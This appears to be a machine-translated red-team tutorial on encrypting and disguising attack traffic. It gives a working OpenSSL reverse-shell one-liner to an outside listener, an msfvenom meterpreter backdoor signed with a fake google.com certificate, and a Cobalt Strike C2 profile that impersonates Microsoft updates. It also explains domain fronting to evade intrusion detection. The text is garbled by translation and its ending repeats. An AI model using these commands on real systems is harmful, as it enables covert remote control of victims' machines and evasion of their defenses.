MSF CS OpenSSL traffic encryption

OpenSSL Rebound encryption shell

OpenSSL Is an open source software library , Applications can use this package for secure communication , Avoid eavesdropping , At the same time, confirm the identity of the connector at the other end . This package is widely used in web servers on the Internet

stay kali Upper use OpenSSL Generate a self-signed certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

stay kali On the listening port

openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

Perform a bounce on the target shell command

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s

msf Traffic encryption evasion detection

OpenSSL establish SSL/TLS certificate

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt>www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

Create a back door

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.11.132 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

Copy the makefile to the target machine

Use msf monitor

From the moment the payload will execute on the target host , An encrypted meterpreter The session will open , It will not allow the host intrusion prevention system to check packets and disconnect

The packet capturing data packet has been encrypted

cobalt strike Generate certificate modification c2 profile Traffic encryption is confusing

Generate free ssl certificate

Running cs Default cobaltstrike.store certificate , The meaning of generating a new certificate is that we will use our current developed certificate , Default certificate cs Will be tested , The following is the command to generate the certificate .

keytool -genkey -alias moonsec -keyalg RSA -validity 36500 -keystore moonsec.store

moonsec moonces.store Remember these two strings , modify profile Use to fill in the relevant regional information This information is filled in at profile Also use , Please don't fill in , Fill in the to save .

After completing the above command, you will be prompted for the password you want to enter Input password moocsec123 After that, you will be prompted with regional information Follow the prompts step by step to fill in

Create and modify c2-profile file

set sample_name "xbb POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
# Set Certificate 
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}
# Set up 
code-signer{
set keystore "moonsec.store";
set password "moonsec123";
set alias "alias";
}
# Appoint  DNS beacon  When not in use, designate to  IP  Address 
set dns_idle "8.8.4.4";
# Each individual  DNS  Force sleep time before request 
set dns_sleep "0";
# adopt  DNS  Maximum length of host name when uploading data [0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}

Test certificate

function teamserver

nohup ./teamserver 192.168.11.132 admin moonsec.profile &

Domain preposition cobalt strike escape IDS Audit

Domain prefixes are based on https Unified evasion technology , Also known as domain front-end network attack technology . It's a way to hide metasploit,cobalt strike Wait for the team to control server traffic , So as to bypass the technology of checker or firewall detection to a certain extent , Such as Amazon,Google,Akamai And other large manufacturers will provide some domain front-end technical services

The principle of domain front technology ： adopt CDN Nodes forward traffic to real c2 The server , among CDN node ip By identifying the requested Host The header forwards the traffic , Use us to configure the high reliability of the domain name , For example, we can set up a subdomain of Microsoft , Can effectively avoid DLP,agent And so on

cobalt strike Domain pre configuration

modify c2 Of profile file , stay https://github.com/xx0hcd/Malleable-C2-Profiles Choose the right one profile file modify host The domain name that the head has prepared for us

stay kali Up operation teamserver Plus configuration files

nohub ./teamserver 192.168.11.132 admin cdn.profile

nohub Add to the front of a command to indicate the running command without hanging up Otherwise shell Broken cs And it won't connect
x0hcd/Malleable-C2-Profiles Choose the right one profile file modify host The domain name that the head has prepared for us

stay kali Up operation teamserver Plus configuration files

nohub ./teamserver 192.168.11.132 admin cdn.profile

nohub Add to the front of a command to indicate the running command without hanging up Otherwise shell Broken cs And it won't connect